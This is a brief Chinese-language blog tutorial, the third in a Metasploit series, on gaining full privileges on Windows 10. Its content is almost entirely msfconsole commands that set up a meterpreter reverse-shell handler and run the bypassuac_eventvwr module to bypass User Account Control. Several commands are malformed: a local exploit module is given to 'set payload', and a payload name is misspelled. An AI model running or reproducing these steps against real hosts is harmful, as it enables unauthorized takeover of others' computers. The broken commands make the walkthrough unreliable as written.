metasploit滲透第三篇

版權聲明：本文為部落客原創文章，轉載必須寫明出處。

windows 10提權

在這裡不得不說，metasploit滲透第二篇中，可以發現win10以下的系統可以簡簡單單使用getsystem的拿到最高權限，但是win10卻不行，接下來我們看看如何拿到最高權限。

1.檢視目标主機的作業系統

a) X86作業系統

b) X64作業系統

2.使用msf建立會話

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
           

3.提權

msf exploit(handler) > search bypassuac //使用bypassuac(繞過使用者帳戶控制)

    msf exploit(handler) >set payload exploit/windows/local/bypassuac_eventvwr    # 在x64使用成功
    msf exploit(handler) >set payload windows/x64/meterprese/reverse_tcp
    msf exploit(handler) >show targets //檢視目标，可選項，根據作業系統選擇
    msf exploit(handler) >set target 1 #設定目标為x64，0：x86
    msf exploit(handler) >exploit